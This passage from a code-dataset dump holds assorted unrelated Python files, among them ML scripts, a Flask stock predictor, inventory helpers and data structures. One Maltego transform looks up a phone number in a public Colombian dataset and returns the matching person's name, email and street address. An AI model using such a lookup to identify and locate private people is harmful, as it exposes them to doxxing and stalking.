in array[2:]], 1 if array[1] == \"M\" else -1))\n\n    rlen = llength(result)\n    x_min, x_max = numpy.array([1e10] * rlen), zeros(rlen)\n    for (x, _) in result:\n        for i in range(rlen):\n            x_min[i] = min(x_min[i], x[i])\n            x_max[i] = max(x_max[i], x[i])\n    for (x, _) in result:\n        for i in range(rlen):\n            x[i] = (x[i] - x_min[i]) / (x_max[i] - x_min[i]) if x_max[i] != x_min[i] else 1\n\n    return result\n\n\ndef norm(x):\n    return numpy.sqrt(numpy.inner(x, x))\n\ndef function(x, c=1):\n    return c / (1 + exp(x))\n\ndef calculate_error(data, w):\n    count = 0\n    for (x, y) in data:\n        cl = 1.0 if function(-numpy.inner(x, w)) >= 0.5 else -1.0\n        if cl != y:\n            count += 1\n    return count / len(data)\n\ndef linear_regression_w(data, c, exp_value=20, eps=0.1, rate=0.01):\n    m = llength(data)\n    w = numpy.zeros(m)\n    dif_prev = 0\n    while True:\n        w_prev = numpy.array(w)\n        for (x, y) in data:\n            grad = numpy.zeros(m)\n            for j in range(m):\n                v = y * numpy.inner(w, x)\n                if v < exp_value:\n                    grad[j] += function(v, y * x[j])\n                if j != 0:\n                    grad[j] += c * w[j]\n            w += rate * grad\n        dif_norm = norm(w - w_prev)\n        if dif_prev < dif_norm and dif_prev != 0:\n            break\n        else:\n            dif_prev = dif_norm\n        if dif_norm < eps:\n            break\n\n    return w\n\ndef cross_validate(data, c, n=10):\n    step = len(data) // n\n    result = 0\n    for i in range(0, len(data), step):\n        w = linear_regression_w(data[i + step:] + data[:i], c)\n        result += calculate_error(data[i:i + step], w)\n    return result / n\n\n\ndef get_constant(data, base=3, n=10):\n    result, min_error = 1, 1\n\n    for d in range(n):\n        c = base ** -d\n        error = cross_validate(data, c)\n        print(\"current deg = %d, current const = %f, current err = %f\" % (d, c, error))\n        if error < min_error:\n            min_error = error\n            result = c\n\n    return result\n\ndef main():\n    data = get_data()\n    numpy.random.shuffle(data)\n    test_len = int(len(data) * 0.2)\n    xs, ys = data[test_len:], data[:test_len]\n\n    c = get_constant(xs)\n    w = linear_regression_w(xs, c)  # fit on the training split; w was previously used before ever being assigned\n    e = calculate_error(ys, w)\n    print('regularization constant = %f' % c)\n    print('error = %6.2f' % (100 * e))\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"sergey.muravyov/lab_4/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"500326362","text":"import urllib.request as ur\n\ndef open_url(url):\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n    req = ur.Request(url=url, headers=headers) # python2,urllib.request()\n    response = ur.urlopen(req) # python2,urllib2.urlopen()\n    return response.read().decode('utf-8')\n\nurl = \"https://www.kaggle.com/c/youtube8m\"\nprint (open_url(url))","sub_path":"conment.py","file_name":"conment.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"49011319","text":"#!/usr/bin/env\n# -*- coding: utf-8 -*-\n# filename = core\n# author=SluttyScience\n# date = 7/31/17\n\"\"\" filename = core\"\"\"\nfrom __future__ import absolute_import, unicode_literals\nfrom startups import *\nimport sys, os\nimport _regex_core\nimport regex\nfrom startups.core import AttrDict, OrderedSet\nfrom requests.structures import CaseInsensitiveDict\nfrom collections import defaultdict\nfrom fractions import Fraction, Decimal, _RATIONAL_FORMAT\nfrom toolz import merge\nfrom operator import and_\n#from startups.regular._util import Property, ids_to_value\nimport sre_constants\nfrom _regex_core 
import (GLOBAL_FLAGS, V1 as version, _get_required_string, OP, CHARSET_ESCAPES,\nREGEX_FLAGS, SCOPED_FLAGS, DEFAULT_FLAGS, PROPERTY_NAMES, PROPERTIES, CASE_FLAGS\n )\nfrom regex import _METACHARS as METACHARS\n\n\ndef requires_class(x):\n\tdef class_name(obj):\n\t\tfrom twisted.python.reflect import _determineClassName\n\t\treturn _determineClassName(obj) == x\n\treturn class_name\n\n\n\n\nREVERSE = _regex_core.REVERSE\nSUCCESS = OP.SUCCESS\n\n\nPROPERTIES = regex._regex.get_properties()\nP = AttrDict(PROPERTIES)\n\ndef is_binary(tup):\n\tname = tup[0]\n\tprop_val = tup[-1]\n\treturn 'YES' in prop_val\n\nBINARY = {'F': 0, 'FALSE': 0, 'N': 0, 'NO': 0, 'T': 1, 'TRUE': 1, 'Y': 1, 'YES': 1}\nBINARY_PROPERTIES = {k: v[0] for k, v in P.items() if is_binary(v)}\nBINARY_ITEMS = sorted(BINARY_PROPERTIES.items(), key=lambda x: x[1])\nNON_BINARY_PROPERTIES = {k: v for k, v in P.items() if not is_binary(v)}\nNON_BINARY_ITEMS = {k: v[0] for k, v in NON_BINARY_PROPERTIES.items()}\n_NBI = sorted(NON_BINARY_ITEMS.items(), key=lambda x: x[1])\nnon_binary_dict = defaultdict(OrderedSet)\nbinary_dict = defaultdict(OrderedSet)\n\nfor k, v in NON_BINARY_ITEMS.items():\n\tnon_binary_dict[v].add(k)\nfor k,v in BINARY_PROPERTIES.items():\n\tbinary_dict[v].add(k)\n\t\ncombined_dict = merge(non_binary_dict, binary_dict)\n\n\n\n\nfrom _regex_core import (CHARSET_ESCAPES, POS_TEXT, CASE_TEXT, CHARACTER_ESCAPES,\n\nis_octal, is_hexadecimal,\n )\n\n\nESCAPES = dict()\nESCAPES.update(CHARSET_ESCAPES)\nESCAPES.update(CHARACTER_ESCAPES)\n\nESCAPE_MAPPINGS = dict(\n\t\td = '0',\n\t\tD = 'x',\n\t\ts = ' ',\n\t\tS = 'x',\n\t\tw = 'x',\n\t\tW = '!',\n)\nHEX_ESCAPES = dict([('U', 8), ('u', 4), ('x', 2)])\n\n\n\n\n#\\xXX Matches the Unicode codepoint with 2-digit hex code XX.\n#\\UXXXXXXXX Matches the Unicode codepoint with 8-digit hex code XXXXXXXX.\n#\\uXXXX Matches the Unicode codepoint with 4-digit hex code XXXX.\n#\\N{name}\n#\\K Keeps only what follows for the entire match.\n#\\g Matches the text matched by the group named name.\n#\\number Matches the contents of the group of the same number if\n# number is no more than 2 digits, otherwise the character\n# with the 3-digit octal code.\n#\".\" Matches any character except a newline.\n#\".\",DOTALL Matches any character.\n\"\"\"\n\n'%(ok)s' % {'ok':1}\n[...] Indicates a set of characters. A \"^\" as the first\n character indicates a complementing set.\n(?flags-flags) VERSION1: Sets/clears the flags for the remainder of\n the group or pattern; VERSION0: Sets the flags for the\n entire pattern.\n(?:...) Non-capturing version of regular parentheses.\n(?>...) Atomic non-capturing version of regular parentheses.\n(?P=name) Matches the text matched earlier by the group named\n name.\n(?#...) A comment; ignored.\n(?=...) Matches if ... matches next, but doesn't consume the\n string.\n(?(DEFINE)...) If there's no group called \"DEFINE\", then ... will be\n ignored, but any group definitions will be available.\n(?|...|...) 
(?|A|B), creates an RE that will match either A or B,\n but reuses capture group numbers across the\n alternatives.\n\ncode(argcount, kwonlyargcount, nlocals, stacksize, flags, codestring,\nconstants, names, varnames, filename, name, firstlineno,\nlnotab[, freevars[, cellvars]])\n\n\n\nco_argcount operator.attrgetter('__code__.co_argcount')\nco_kwonlyargcount operator.attrgetter('__code__.co_kwonlyargcount')\nco_nlocals\nco_stacksize\nco_flags\nco_code\nco_consts operator.attrgetter('__code__.co_consts')\nco_names operator.attrgetter('__code__.co_names')\nco_varnames operator.attrgetter('__code__.co_varnames')\nco_filename\nco_name\nco_firstlineno\nco_lnotab\nco_freevars operator.attrgetter('__code__.co_freevars')\nco_cellvars operator.attrgetter('__code__.co_cellvars')\n\n##\n('co_argcount',\n 'co_kwonlyargcount',\n 'co_nlocals',\n 'co_stacksize',\n 'co_flags',\n 'co_code',\n 'co_consts',\n 'co_names',\n 'co_varnames',\n 'co_filename',\n 'co_name',\n 'co_firstlineno',\n 'co_lnotab',\n 'co_freevars',\n 'co_cellvars')\n\n\n\n\n\nSplit the source string by the occurrences of the pattern, returning a\nlist containing the resulting substrings. If capturing parentheses are used\nin pattern, then the text of all groups in the pattern are also returned as\npart of the resulting list. If maxsplit is nonzero, at most maxsplit splits\noccur, and the remainder of the string is returned as the final element of\nthe list.\n\n\n< search (pattern, string, flags=0, pos=None, endpos=None, partial=False, concurrent=None, **kwargs)>\n\n\nregex.finditer\n\n\narg(regex.findall)\n\n\nexpandf(...)\nexpandf(format) --> string.\nReturn the string obtained by using the format, as done by the subf() method.\n\n\n\n span(...)\n | span([group1, ...]) --> 2-tuple of int or tuple of 2-tuple of ints.\n | Return the span (a 2-tuple of the indices of the start and end) of one or\n | more subgroups of the match. If there is a single argument, the result is a\n | span, or (-1, -1) if the group did not contribute to the match; if there are\n | multiple arguments, the result is a tuple with one item per argument; if\n | there are no arguments, the span of the whole match is returned. Group 0 is\n | the whole match.\n |\n\n\nspans and starts and ends is for captures\nspan and start and end is for groups\n\n\nendpos; The final position beyond which the regex engine won't search.\npos: The position at which the regex engine starting searching.\nre: The regex object that produced this match object.\nregs: A tuple of the spans of the capturing groups.\nstring: The string that was searched, or None if it has been detached.\n\n\n\n\nself.partial\nself.string\nself.flags = self.re.flags\n\nself.re = cls\nself.pattern = self.re.pattern\nself.named_lists = self.re.named_lists\n\nself.group_names = self.pattern.groupindex.keys()\n\n\n#_fields\n\n\nPD =('pattern',\n 'flags',\n 'code',\n 'group_index',\n 'index_group',\n 'named_lists',\n 'named_list_indexes',\n 'req_offset',\n 'req_chars',\n 'req_flags',\n 'group_count')\n\n\n\n\n\"\"\"\n\n\ndef get_regular(obj):\n\tfrom inspect import signature\n\tsig = signature(obj)\n\treturn [(x.name, x.default) for x in sig.parameters.values()\n\t if x.kind in (x.POSITIONAL_ONLY, x.POSITIONAL_OR_KEYWORD, x.VAR_POSITIONAL)]\n\n\ndef num_pos_args(obj):\n\t\"\"\" Return the number of positional arguments. 
``f(x, y=1)`` has 1\"\"\"\n\tfrom inspect import signature\n\tsigspec = signature(obj)\n\treturn sum(1 for x in sigspec.parameters.values()\n\t if x.kind == x.POSITIONAL_OR_KEYWORD\n\t and x.default is x.empty)\n\n\n\ndef get_exclude_keywords(obj):\n\t\"\"\" Return the names of position-only arguments if func has **kwargs\"\"\"\n\tfrom inspect import signature\n\tsigspec = signature(obj)\n\tnum_pos_only = num_pos_args(obj)\n\tif num_pos_only == 0:\n\t\treturn ()\n\thas_kwargs = any(x.kind == x.VAR_KEYWORD for x in sigspec.parameters.values())\n\tif not has_kwargs:\n\t\treturn ()\n\tpos_args = list(sigspec.parameters.values())[:num_pos_only]\n\treturn tuple(x.name for x in pos_args)\n\n\n\ndef get_arguments(func):\n\tfrom inspect import signature\n\tsigspec = signature(func)\n\treturn list(sigspec.parameters.values())\n\n\ndef def_overlapped_findall(pattern, string, flags=0, pos=None, endpos=None):\n\treturn regex.findall(pattern, string, flags=flags, pos=pos, endpos=endpos)\n\n\n\ndef get_find(pattern, string, flags=0, partial=False, overlapped=True, pos=None, endpos=None):\n\tif not isinstance(pattern, str):\n\t\tflags = pattern.flags\n\t\tpattern = pattern.pattern\n\t\t\n\treturn regex.finditer(pattern, string=string, flags=flags, partial=partial, overlapped=overlapped, pos=pos, endpos=endpos)\n\n\ndef get_fullmatch(string, pos, endpos, partial=True): pass\n\n\n\n\ndef get_partial_search(pattern, string, flags, pos=None, endpos=None):\n\treturn regex.search(pattern, string, flags, pos=pos, endpos=endpos, partial=True)\n\n\n\n\n\ndef return_partial_endpos(string, endpos, partial=True): pass\n\n\n\n\n\n\nif __name__ == '__main__': print(__file__)","sub_path":"startups/regular/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":9018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329113106","text":"# Makes rarefaction plots for a set of genomes.\n\nfrom covid_bronx.variants import parse_nextclade\nimport pandas as pd\nfrom tqdm import tqdm\nimport os\nimport matplotlib.pyplot as plt\nimport plot_helper\nfrom plot_helper import Plotter\n\ninput_file = 'wadsworth/bronx.json'\noutput_folder = 'wadsworth'\n\nplot_helper.BASE_FILEPATH = output_folder\nplot_helper.SHOW = True\n\ndf = pd.read_csv(\"wadsworth/GISIAD_Meta_Bronx.csv\")\n\nlineages = df['Lineage']\nlineages.index = df['Collection date']\nlineages = lineages.sort_index()\n\ndate_range = pd.date_range(lineages.index.min(), lineages.index.max())\n\npdf = pd.DataFrame(index=date_range, columns = set(lineages)).fillna(0)\n\nfor d,l in lineages.items():\n try:\n pdf.loc[d,l] += 1\n except:\n pass\n\ncdf = pdf.cumsum()\ncdf = cdf[cdf.iloc[-1].sort_values(ascending=False).index]\n\nwith Plotter(filename='lineages_gisaid.pdf', figsize=(20,20)) as ax:\n cdf.loc[:, cdf.iloc[-1]>2000].plot(ax=ax, cmap='tab20b')\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Count\")\n ax.set_title(\"Bronx Rarefaction of Most Common Lineages\")\n\na, b = parse_nextclade(input_file)\n\nmeta = []\nvariants = []\n\nfor i in tqdm(range(41)):\n a,b = parse_nextclade(f\"gisaid_jan21/output_{i}.json\")\n meta.append(a)\n variants.append(b)\n\nda = pd.concat(meta)\ndb = pd.concat(variants)\ndb['country'] = db['seqName'].apply(lambda x: x.split(\"/\")[0])\n \ndates = {r['Virus name']: r['Collection date'] for _,r in df.iterrows()} \nb['Date'] = b['seqName'].apply(lambda x: x.split(\"|\")[0]).map(dates)\n\n# spike = b[(b['position']>26523)&(b['position']<=27191)]\nspike = 
b[(b['position']>21563)&(b['position']<=25384)]\nspike.index = spike['Date']\nspike = spike.sort_index()\nspike['Variant'] = spike['mutation'] + \" \" + spike['aaMutation'].apply(str)\nvariants = spike['Variant'].dropna()\n\ndate_range2 = pd.date_range(spike.index.min(), spike.index.max())\n\npdf2 = pd.DataFrame(index=date_range2, columns = set(variants)).fillna(0)\n\nfor d,l in variants.items():\n    pdf2.loc[d,l] += 1\n\ncdf2 = pdf2.cumsum()\ncdf2 = cdf2[cdf2.iloc[-1].sort_values(ascending=False).index]\n\nwith Plotter(filename='spike_variants.pdf', figsize=(20,20)) as ax:\n    cdf2.loc[:, (cdf2.iloc[-1]>2) & (cdf2.iloc[-1]<100)].plot(ax=ax, cmap='tab20b')\n    ax.set_xlabel(\"Date\")\n    ax.set_ylabel(\"Count\")\n    ax.set_title(\"Bronx Rarefaction of Most Common Spike Variants\")\n\ndef cave_plot(df, ax=None, **kwargs):\n\n    if ax:\n        object = ax\n    else:\n        object = plt\n\n    bottom = 0.\n    for col in df.columns:\n        top = df[col] + bottom\n        object.fill_between(df.index, bottom, top, label=col, **kwargs)\n        bottom = top\n\n    return object\n\nratios = (cdf.T / cdf.T.sum()).T\n\nwith Plotter(filename='gisaid_lineages_cave.pdf', figsize=(20,20)) as ax:\n    ax = cave_plot(ratios, ax, cmap='tab20b')\n    plt.legend(loc='upper left')\n    ax.set_title(\"Ratios of Lineages in World Over Time\")\n    ax.set_xlabel(\"Date\")\n    ax.set_ylabel(\"Relative Abundance\")\n\nratios2 = (cdf2.T / cdf2.T.sum()).T\n\nwith Plotter(filename='variants_cave.pdf', figsize=(20,20)) as ax:\n    ax = cave_plot(ratios2.loc[:, (cdf2.iloc[-1]>1)], ax, cmap='tab20b')\n    plt.legend(loc='upper left')\n    ax.set_title(\"Ratios of Variants in Bronx Over Time\")\n    ax.set_xlabel(\"Date\")\n    ax.set_ylabel(\"Relative Abundance\")\n\nwith Plotter(filename='variants_cave_full.pdf', figsize=(20,20)) as ax:\n    ax = cave_plot(ratios2, ax, cmap='tab20b')\n    plt.legend(loc='upper left')\n    ax.set_title(\"Ratios of Variants in Bronx Over Time\")\n    ax.set_xlabel(\"Date\")\n    ax.set_ylabel(\"Relative Abundance\") ","sub_path":"scripts/variants/rarefaction.py","file_name":"rarefaction.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631937057","text":"import asyncio\nimport itertools\n\n\nasync def listwords(alphabets, length: int, queue):\n    for alph in alphabets:\n        for word in itertools.product(alph, repeat=length):\n            await queue.put(word)\n    print(f\"producer finished\")\n    await queue.put(None)\n\n\nasync def worker(i, queue): \n    print(f\"worker-{i} started\")\n    while True:\n        word = await queue.get()\n        if word is None:\n            await queue.put(None)\n            print(f\"worker-{i} found sentinel\")\n            queue.task_done()\n            break\n        else:\n            # do something with result here:\n            await asyncio.sleep(0.01)\n            queue.task_done()\n\n\nasync def main(nworkers, qsize, alphabets, length):\n    from asyncio import create_task\n    queue = asyncio.Queue(qsize)\n    producer = create_task(listwords(alphabets, length, queue))\n    workers = (create_task(worker(i, queue)) for i in range(nworkers)) \n    await asyncio.gather(producer, *workers)\n\n\nif __name__ == "__main__":\n    import time\n    start = time.perf_counter()\n    nworkers = 5\n    qsize = 100\n    alphabets = ('ABC','RAD','OLD','POT','YEP')\n    asyncio.run(\n        main(nworkers, qsize, alphabets, 6)\n    )\n    runtime = time.perf_counter() - start\n    print(f\"Took {runtime}s\")\n","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98509990","text":"from SNN 
import neuron\n\n\n\ndef create_neurons(num_layers=0, num_neurons=0, debug=True):\n neurons = []\n for layer in range(num_layers):\n if debug:\n print ('create_neurons(): Creating layer {}'.format(layer))\n neuron_layer = []\n for count in range(num_neurons):\n neuron_layer.append(neuron.LIF(debug=debug))\n neurons.append(neuron_layer)\n return neurons","sub_path":"SNN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277800485","text":"# APP ROUTINE\n# ===========\nfrom flask import Flask, request, render_template\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n\treturn render_template('home.html')\n\n@app.route('/getstockprice',methods=['POST','GET'])\ndef get_delay():\n if request.method=='POST':\n result = request.form\n\n print('request received:', result['TICKER'])\n\n # LIBRARIES\n # =========\n from keras.models import model_from_json\n from keras.optimizers import Adam\n import pandas as pd\n from sklearn.preprocessing import MinMaxScaler, StandardScaler\n from utils import create_dataset, load_model_from_disk\n import numpy as np\n from dateutil.relativedelta import relativedelta\n import datetime\n\n # PARAMETERS\n # =========\n look_back = 5 # LSTM lookback\n lag = 2 # based on yesterday's prices, predict tomorrow's (no info on today's close)\n learning_rate = 0.0001\n\n # load network, weights and compile model\n # =======================================\n try:\n loaded_model = load_model_from_disk(model_from_json)\n A = Adam(lr=learning_rate)\n loaded_model.compile(loss='mse', optimizer=A)\n\n except FileNotFoundError:\n print('no model found!')\n exit()\n\n\n # get the data\n # ============\n print('loading data')\n df = pd.read_csv('prices.csv', header=0)\n other_features = pd.read_csv('prices.csv', header=0)\n\n # TICKER SELECTION\n # ================\n ticker = result['TICKER']\n\n print('TICKER: ', ticker)\n\n if ticker not in df.symbol.unique():\n print('no ticker {}!'.format(ticker))\n exit()\n\n ticker_data = df[df['symbol'] == ticker]\n ticker_data_feats = other_features[other_features['symbol'] == ticker]\n # the output variable\n stock_price = ticker_data.close.values.astype('float32')\n stock_price = stock_price.reshape(len(stock_price), 1)\n\n features = list(set(ticker_data_feats.columns) - set(['date', 'symbol']))\n\n # SCALE\n # =====\n scaler = MinMaxScaler(feature_range=(0, 1))\n stock_price = scaler.fit_transform(stock_price)\n\n feature_scaler = StandardScaler()\n ticker_data_feats = feature_scaler.fit_transform(ticker_data_feats[features].values)\n\n # LOOK BACK\n # =========\n X, Y = create_dataset(stock_price, look_back, lag=lag)\n\n # RESHAPE LSTM STYLE\n # ==================\n X = np.reshape(X, (X.shape[0], 1, X.shape[1]))\n\n # PREDICT\n # =====\n yhat = loaded_model.predict([X, ticker_data_feats])\n\n # OUTPUT DATA\n # ===========\n ts = pd.DataFrame(stock_price[look_back+1:], columns=['actual'])\n ts['ticker'] = ticker\n ts['pred'] = scaler.inverse_transform(yhat.ravel())\n ts['actual'] = scaler.inverse_transform(ts['actual'])\n ts['date'] = ticker_data[look_back+1:]['date'].values\n ts['error'] = abs(ts['pred'] - ts['actual'])/ts['actual']\n print('RMSE: ', (abs(ts['pred'] - ts['actual'])/ts['actual']).mean() ) #0.032\n\n\n try:\n output = output.append(ts)\n except NameError:\n output = pd.DataFrame(ts)\n\n output.to_csv('scoring_out.csv', index=False)\n\n # SEND VALUES\n # ===========\n OUT_DATE = 
\"{:%Y-%m-%d}\".format(datetime.datetime.strptime(result['OUT_DATE'], \"%Y-%m-%d\")\n + relativedelta(days=1))\n PREV_DATE = \"{:%Y-%m-%d}\".format(datetime.datetime.strptime(result['OUT_DATE'], \"%Y-%m-%d\"))\n\n prev_value = output[output.date == PREV_DATE]['actual'].values\n # just over the weekend\n if prev_value < 1:\n print('weekend', prev_value)\n PREV_DATE = \"{:%Y-%m-%d}\".format(datetime.datetime.strptime(result['OUT_DATE'], \"%Y-%m-%d\")\n - relativedelta(days=3))\n prev_value = output[output.date == PREV_DATE]['actual'].values\n\n app_result = {'OUT_DATE': OUT_DATE}\n app_result['OUT_VALUE'] = output[output.date == OUT_DATE]['pred']\n app_result['OUT_DELTA'] = prev_value - \\\n output[output.date == OUT_DATE]['pred'].values\n\n\n return render_template('result.html', out_date=app_result['OUT_DATE'],\n out_value=app_result['OUT_VALUE'].values,\n out_delta=app_result['OUT_DELTA'])\n\nif __name__ == '__main__':\n\tapp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384284636","text":"from datetime import datetime\nfrom collections import Counter\n\ndef registrar_producto(productos, producto):\n \"\"\"\n Registrar un nuevo producto en el inventario.\n \"\"\"\n productos.append(producto)\n\ndef realizar_venta(ventas, venta):\n \"\"\"\n Crea una nueva venta\n \"\"\"\n venta['fecha'] = datetime.now()\n ventas.append(venta)\n\ndef buscar_producto(productos, id_producto):\n \"\"\"\n Busca un producto a partir de su ID.\n \"\"\"\n for p in productos:\n if p['id_producto'] == id_producto:\n return p\n \n return None\n\ndef cambiar_estado_producto(producto):\n \"\"\"\n Cambia el estado de un producto.\n \"\"\"\n producto['disponible'] = not producto['disponible']\n\ndef ventas_rango_fecha(ventas, fecha_inicio, fecha_final):\n \"\"\"\n Obtiene las ventas que se han realizado en un rango de fecha.\n \"\"\"\n ventas_rango = []\n\n for v in ventas:\n if fecha_inicio <= v['fecha'] <= fecha_final:\n ventas_rango.append(v)\n \n return ventas_rango\n\ndef top_5_mas_vendidos(ventas):\n \"\"\"\n Obtiene el top 5 de los productos más vendidos.\n \"\"\"\n conteo_ventas = {}\n\n for v in ventas:\n if v['id_producto'] in conteo_ventas:\n conteo_ventas[v['id_producto']] += v['cantidad']\n else:\n conteo_ventas[v['id_producto']] = v['cantidad']\n\n conteo_ventas = {k: v for k, v in sorted(conteo_ventas.items(), key=lambda item: item[1], reverse=True)}\n\n contador = Counter(conteo_ventas)\n\n return contador.most_common(5)\n\ndef top_5_menos_vendidos(ventas):\n \"\"\"\n Obtiene el top 5 de los productos menos vendidos.\n \"\"\"\n conteo_ventas = {}\n\n for v in ventas:\n if v['id_producto'] in conteo_ventas:\n conteo_ventas[v['id_producto']] += v['cantidad']\n else:\n conteo_ventas[v['id_producto']] = v['cantidad']\n\n conteo_ventas = {k: v for k, v in sorted(conteo_ventas.items(), key=lambda item: item[1])}\n\n contador = Counter(conteo_ventas)\n\n return contador.most_common()[:-6:-1]\n\ndef mostrar_datos_producto(producto):\n \"\"\"\n Muestra los datos particulares de un producto.\n \"\"\"\n print('Nombre: %s' % producto['nombre'])\n print('ID: %i' % producto['id_producto'])\n print('Precio: $%.2f' % producto['precio'])\n print('Cantidad: %i' % producto['cantidad'])\n print('¿Disponible?: %s' % ('Sí' if producto['disponible'] else 'No'))\n\ndef mostrar_datos_venta(productos, venta):\n \"\"\"\n Muestra los datos particulares de una venta.\n \"\"\"\n print('ID 
Producto: %i' % venta['id_producto'])\n    print('Fecha: %s' % venta['fecha'])\n    print('Cantidad: %i' % venta['cantidad'])\n    print('Total sin IGV: $%.2f' % venta['total_sin_igv'])\n    print('Total: $%.2f' % (venta['total_sin_igv'] * 1.18))\n    print()\n    print('Datos del producto:')\n    mostrar_datos_producto(buscar_producto(productos, venta['id_producto']))\n\ndef mostrar_datos_venta_producto(productos, datos_venta):\n    producto = buscar_producto(productos, datos_venta[0])\n    mostrar_datos_producto(producto)\n    print('Cantidad vendida: %i' % datos_venta[1])\n","sub_path":"inventario/inventario_funciones.py","file_name":"inventario_funciones.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"192046928","text":"#!/usr/bin/env python\r\n# -*- coding: cp1252 -*-\r\nfrom Maltego import *\r\nfrom MaltegoTransform import *\r\nimport pandas as pd\r\nfrom sodapy import Socrata\r\n\r\ndef TelefonoToCorreoDireccionPerson_mk5f_bdwx(m):\r\n    TRX = MaltegoTransform()\r\n    #m.parseArguments(sys.argv)\r\n    #telefono=sys.argv[1]\r\n    telefono=m.Value\r\n    try:\r\n        client = Socrata(\"www.datos.gov.co\", None)\r\n        r = client.get(\"u5mc-hpr6\", limit=2000)\r\n\r\n        #for key, value in data.items():\r\n        #print key, value\r\n        for i in range(len(r)):\r\n            if ( r[i]['celular'] == telefono or r[i]['telefonos'] == telefono) :\r\n                nombre=r[i]['nombre']\r\n                correo_electronico= r[i]['correo_electronico']\r\n                direccion=r[i]['direccion']\r\n                barrio=r[i]['municipio']\r\n                break\r\n\r\n        nombre = nombre.split(\" \")\r\n        if (len(nombre) == 4):\r\n            firts = nombre[0] + \" \" + nombre[1]\r\n            last = nombre[2] + \" \" + nombre[3]\r\n            full = nombre[0] + \" \" + nombre[1] + \" \" + nombre[2] + \" \" + nombre[3]\r\n        else:\r\n            firts = nombre[0]\r\n            last = nombre[1] + \" \" + nombre[2]\r\n            full = nombre[0] + \" \" + nombre[1] + \" \" + nombre[2]\r\n\r\n        ent = TRX.addEntity('maltego.Person', full)\r\n        ent.addAdditionalFields(\"person.firstnames\", \"First Names\", True, firts)\r\n        ent.addAdditionalFields(\"person.lastname\", \"Surname\", True, last)\r\n        ent1 = TRX.addEntity('maltego.EmailAddress', correo_electronico)\r\n        ent4 = TRX.addEntity('maltego.Location', direccion)\r\n        ent4.addAdditionalFields(\"country\", \"Country\", True, \"Colombia\")\r\n        ent4.addAdditionalFields(\"location.area\", \"Area\", True, barrio)\r\n        ent4.addAdditionalFields(\"streetaddress\", \"Street Address\", True, direccion)\r\n\r\n\r\n\r\n    except Exception as e:\r\n        TRX.addUIMessage(\"Cedula no encontrada en la base de datos\")\r\n\r\n    TRX.returnOutput()\r\n\r\n\r\n","sub_path":"telefonoToCorreoDireccionPerson_mk5f-bdwx.py","file_name":"telefonoToCorreoDireccionPerson_mk5f-bdwx.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"322386985","text":"import numpy as np\nfrom matplotlib.colors import ListedColormap\n\ncmpcolor = ['#FFAAAA', '#AAFFAA', '#AAAAFF']\n\n\ndef create_meshgrid_pic(plt, predict, X, Y, classes_color=cmpcolor, step=0.05):\n    # 确认训练集的边界\n    x_min, x_max = X[:].min() - 1, X[:].max() + 1\n    y_min, y_max = Y[:].min() - 1, Y[:].max() + 1\n    # 生成网格数据,xx:所有网格点的x坐标,形状也是网格性nxm。yy同样\n    xx, yy = np.meshgrid(np.arange(x_min, x_max, step),\n                         np.arange(y_min, y_max, step))\n    # xx,yy的扁平化成一串坐标点(密密麻麻的网格点平摊开来)\n    d = np.c_[xx.ravel(), yy.ravel()]\n    # 对网格点进行类型预测\n    Z = predict(d)\n    # 预测类型后,重新变回网格的样子,因为后面pcolormesh接收网格形式的绘图数据\n    Z = Z.reshape(xx.shape)\n    # 获取类型数量\n    class_size = 
np.unique(Z).size\n if class_size > len(classes_color):\n print('颜色列表太少')\n return AttributeError\n print(class_size)\n classes_color = classes_color[:class_size]\n\n cmap_light = ListedColormap(classes_color)\n\n # 接收网格化的x,y,z\n plt.pcolormesh(xx, yy, Z, cmap=cmap_light)\n","sub_path":"绘图/网格绘图.py","file_name":"网格绘图.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200929456","text":"class node:\n def __init__(self,data):\n self.data=data\n self.next=None\n \ndef linkedlist(a):\n head=None\n current=None\n for i in a:\n if i==-1:\n break\n newnode=node(i)\n if head is None:\n head=newnode\n current=head\n else:\n current.next=newnode\n current=current.next\n return head\n\ndef length(head):\n c=0\n while head.next!=None:\n c+=1\n head=head.next\n return c+1 \n \ndef insert(head1,position,data):\n if position>(l+1):\n return head1\n newnode=node(data)\n head=head1\n if position==1:\n newnode.next=head\n head=newnode\n return head\n else: \n for i in range(position-2):\n head=head.next\n newnode.next=head.next\n head.next=newnode\n return head1\n\ndef printll(head):\n while head!=None:\n print(head.data,'-> ',end=\"\")\n head=head.next\n print(None)\n \na=[1,2,3,4,5,6,7,8,-1] \nhead=linkedlist(a)\nprintll(head)\n# insert(head,position,data)\nl=length(head)\nhead=insert(head,1,9)\nprintll(head)\n","sub_path":"DSA_python/05. 